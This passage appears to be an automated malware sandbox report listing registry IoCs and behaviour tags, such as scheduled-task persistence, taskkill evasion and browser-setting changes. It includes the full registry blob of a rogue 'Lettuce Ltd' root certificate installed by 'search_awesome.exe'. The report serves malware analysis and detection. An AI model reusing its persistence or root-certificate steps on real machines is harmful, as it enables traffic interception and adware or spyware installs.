Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	svchost.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

pid	Process
7336	schtasks.exe
5760	schtasks.exe

Kills process with taskkill 3 IoCs

evasion

pid	Process
8024	taskkill.exe
4344	taskkill.exe
4668	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 7 IoCs

adware spyware

Modify Registry

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	OneDriveSetup.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\OneDrive.exe = "11000"	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe

Modifies data under HKEY_USERS 19 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	svchost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\Version = "7"	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	svchost.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\16\52C64B7E	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit	svchost.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{e9de26a1-51b2-47b4-b1bf-c87059cc02a7}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{b5c25645-7426-433f-8a5f-42b7ff27a7b2}\TypeLib	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{C2FE84F5-E036-4A07-950C-9BFD3EAB983A}\TypeLib\ = "{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}"	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\TypeLib\{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}\1.0\FLAGS	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\CLSID\{5AB7172C-9C11-405C-8DD5-AF20F3606282}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\21.150.0725.0001\\amd64\\FileSyncShell64.dll"	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\CLSID\{94269C4E-071A-4116-90E6-52E557067E4E}\VersionIndependentProgID	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\SyncEngineStorageProviderHandlerProxy.SyncEngineStorageProviderHandlerProxy.1\CLSID\ = "{A3CA1CF4-5F3E-4AC0-91B9-0D3716E1EAC3}"	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{F0AF7C30-EAE4-4644-961D-54E6E28708D6}\TypeLib\ = "{909A6CCD-6810-46C4-89DF-05BE7EB61E6C}"	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\LocalServer32	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\TypeLib\{638805C3-4BA3-4AC8-8AAC-71A0BA2BC284}\1.0	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\ImageStoreRandomFolder = "chyc9ow"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\vg35.xyz\NumberOfSubdomai = "0"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 01000000ed56166bfd8dc1b2d7e48cfb56ecb328c5b1d31581cd250f4236cb45fec7f7cbd5ae4bc5462633d7f93b8383bcde293065721355292534cbd82d	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\InternetRegistry	MicrosoftEdge.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\INTERFACE\{390AF5A7-1390-4255-9BC9-935BFCFA5D57}\TYPELIB	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\CLSID\{5AB7172C-9C11-405C-8DD5-AF20F3606282}	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\CLSID\{9489FEB2-1925-4D01-B788-6D912C70F7F2}\TypeLib	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{2692D1F2-2C7C-4AE0-8E73-8F37736C912D}\TypeLib\ = "{909A6CCD-6810-46C4-89DF-05BE7EB61E6C}"	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{EE15BBBB-9E60-4C52-ABCB-7540FF3DF6B3}\TypeLib	OneDriveSetup.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\INTERFACE\{EA23A664-A558-4548-A8FE-A6B94D37C3CF}\PROXYSTUBCLSID32	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{da82e55e-fa2f-45b3-aec3-e7294106ef52}\ProxyStubClsid32	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{ACDB5DB0-C9D5-461C-BAAA-5DCE0B980E40}\TypeLib\ = "{909A6CCD-6810-46C4-89DF-05BE7EB61E6C}"	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{0d4e4444-cb20-4c2b-b8b2-94e5656ecae8}\TypeLib\ = "{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}"	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\CLSID\{A926714B-7BFC-4D08-A035-80021395FFA8}\VersionIndependentProgID\ = "FileSyncOutOfProcServices.FileSyncOutOfProcServices"	OneDriveSetup.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Instance	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Version = "16777216"	msiexec.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\TypeLib\{638805C3-4BA3-4AC8-8AAC-71A0BA2BC284}\1.0	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\CLSID\{AB807329-7324-431B-8B36-DBD581F56E0B}\LocalServer32	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{53de12aa-df96-413d-a25e-c75b6528abf2}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{fac14b75-7862-4ceb-be41-f53945a61c17}\ = "IToastNotificationEvent"	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\CLSID\{9489FEB2-1925-4D01-B788-6D912C70F7F2}\LocalServer32	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\odopen	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\grvopen\shell\open\command	OneDriveSetup.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{5d65dd0d-81bf-4ff4-aeea-6effb445cb3f}	OneDriveSetup.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\WOW6432NODE\CLSID\{94269C4E-071A-4116-90E6-52E557067E4E}\TYPELIB	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{D0ED5C72-6197-4AAD-9B16-53FE461DD85C}\TypeLib	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{679EC955-75AA-4FB2-A7ED-8C0152ECF409}\TypeLib	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\CLSID\{A926714B-7BFC-4D08-A035-80021395FFA8}	OneDriveSetup.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\vg35.xyz\Total = "193"	MicrosoftEdgeCP.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{79A2A54C-3916-41FD-9FAB-F26ED0BBA755}	OneDriveSetup.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\INTERFACE\{ACDB5DB0-C9D5-461C-BAAA-5DCE0B980E40}\PROXYSTUBCLSID32	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\OOBERequestHandler.OOBERequestHandler.1\CLSID\ = "{94269C4E-071A-4116-90E6-52E557067E4E}"	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\FileSyncClient.AutoPlayHandler\shell\import\DropTarget	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{a7126d4c-f492-4eb9-8a2a-f673dbdd3334}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	OneDriveSetup.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CacheLimit = "1"	MicrosoftEdge.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\ODOPEN\DEFAULTICON	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{2F12C599-7AA5-407A-B898-09E6E4ED2D1E}	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\CLSID\{47E6DCAF-41F8-441C-BD0E-A50D5FE6C4D1}\VersionIndependentProgID	OneDriveSetup.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\totaltopposts.com\ = "939"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = f6a42dbfdaa2d701	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\CLSID\{5999E1EE-711E-48D2-9884-851A709F543D}	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{390AF5A7-1390-4255-9BC9-935BFCFA5D57}	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{5d65dd0d-81bf-4ff4-aeea-6effb445cb3f}\ = "ICreateLibraryCallback"	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{b5c25645-7426-433f-8a5f-42b7ff27a7b2}\TypeLib\Version = "1.0"	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{f0440f4e-4884-4a8F-8a45-ba89c00f96f2}\TypeLib\ = "{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}"	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{a7126d4c-f492-4eb9-8a2a-f673dbdd3334}	OneDriveSetup.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\ShellFolder\Attributes = "4034920525"	FileSyncConfig.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{2F12C599-7AA5-407A-B898-09E6E4ED2D1E}	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{D0ED5C72-6197-4AAD-9B16-53FE461DD85C}\ProxyStubClsid32	OneDriveSetup.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\WOW6432NODE\INTERFACE\{C1439245-96B4-47FC-B391-679386C5D40F}\PROXYSTUBCLSID32	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{c1439245-96b4-47fc-b391-679386c5d40f}\ProxyStubClsid32	OneDriveSetup.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\SYNCENGINESTORAGEPROVIDERHANDLERPROXY.SYNCENGINESTORAGEPROVIDERHANDLERPROXY\CLSID	OneDriveSetup.exe

Modifies system certificate store 2 TTPs 5 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	installer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\0ADEF1D7458FF50D2CB80F9B486455321D405097	search_awesome.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\0ADEF1D7458FF50D2CB80F9B486455321D405097\Blob = 0300000001000000140000000adef1d7458ff50d2cb80f9b486455321d4050972000000001000000e8050000308205e4308203cca003020102020900befe70a4dda2b7cb300d06092a864886f70d01010b0500307f310b30090603550406130247423110300e06035504080c07456e676c616e6431143012060355040a0c0b4c657474756365204c7464312a3028060355040b0c214c657474756365204c746420436572746966696361746520417574686f72697479311c301a06035504030c134c657474756365204c746420526f6f74204341301e170d3138303831333132303033375a170d3338303830383132303033375a307f310b30090603550406130247423110300e06035504080c07456e676c616e6431143012060355040a0c0b4c657474756365204c7464312a3028060355040b0c214c657474756365204c746420436572746966696361746520417574686f72697479311c301a06035504030c134c657474756365204c746420526f6f7420434130820222300d06092a864886f70d01010105000382020f003082020a0282020100ec84dbe1167402d093ee3957327a06f9ec78467185f3758cc42ff40a107901077b927de82e728413da614f1c7f167b842fd796ae20c966e18c3dd3725847531abfe6409a014278e8896fd18294f5e03dec7ae50b78e7ec4dc846f5157cfada8ef851306caf45a27d87c24ad54daa5ca764410a264558c05eb60e434e3174d28da2e8e56623f0920570047c3b57cf4ff981de8ba8062c3ab7334212ad00ac02768d933d0529b1d0607095bfbac20035cc0ae05b09dd87859a8387c18124e518d7161120016425658cd22ba129f5a9f4e09428be41bbc647c9456fe0a2b69ebcf0454b0c0f6fd3a46de9bdfbc74600fcf99a66a58d8a5c20a38272787f91a85d00d150880084cb2dada7701cc49aa4d64e007f6e9f3195a853fdf4a1d179f7d27e51a2dcaac65c4d017c645cd398da383f2a71656f192a314a3937551e33a10254727091235b967f0f596507f9ecc2d43247ac3a012e4125cb12a50a4c7bdc522d18cd0220125c8b30855f977f525a4a7ca16d9baad08e0c45b3fb57a290b2c2fafebe4953b1c8cc054cf196b5f64401b6eb5b1373a965e44cf1d438d307c05993bd41360c04e9537ab5b3780907a35dca4c2366935b49df8e25e8c1796e3150c584789b5c6143c4a51360930509ea83c4f881de1ec129d848d8eba5a081a29fca85b5a4aebeaa4909fa516ca50b2e1598231dbddfed4cab68348c4da0f23f29610203010001a3633061301d0603551d0e04160414379af2941ff3e0417c6af2e31e855e6bf9f82273301f0603551d23041830168014379af2941ff3e0417c6af2e31e855e6bf9f82273300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186300d06092a864886f70d01010b0500038202010007b451d6a5447265e025dbc28a15be06be84d8e583fcce5c4fb244004c1eb101c3e93877ece6ee7979ff9315158787f56252e0f54af375c9a4632a5bcd13eddffe7a1268a60e3b92c6cc39d67e6feb897740e11621ba1402ebccae7b2523ffe666ce2c9f9a2144078ceb615baa6053d0b829bd593bb67b250771c7977a8d2762a14449f446b8477f45f2737ee61d8d409d91efa918a066808c19f61f4e697656eb65ff36729dc647d8bd16b7b37cafa52d2093ea1eef1461ffba97f854253611d96ca818c1b1114e2fb9484f14c302eb70956fb31e55b67b7680862f681dd68b41d5edbced86a424a9c11c5633e102a709e8f5d78d23cd0678e49f64c768f615ff3460271b16b4b9b5c1251e1618145699bd6a44a483bf9e0fbbeda73122e60cc8a40a1cc798f6b893613c25f5dffd1aa5d445ed3c9f6fa9d7696c4ac808d045b46b986bd9afc56227230a099f90d7d1c1de04326aa205c297d5db27b58fd6e7f5a3611c46297786cc295a25f1bce53ed1e2ee78247b14f4621a12c119f89be4dc2411c0c118e90d18d0f433d862e2a8d6b3d8735c2e1001f056eb0e19790bcabbe301a9fa129e4718ad041479116770c4a760087f21cd9ddfd0f01b3b012fce9c0150a926fcf7d11954adab6e40186cf951411da04407ca39c7d120246319fd4053d9f53c01b1363101127beb63fb811fe1691da6851dd5aec644b7dd88b2b5	search_awesome.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	installer.exe

NTFS ADS 1 IoCs

description	ioc	Process
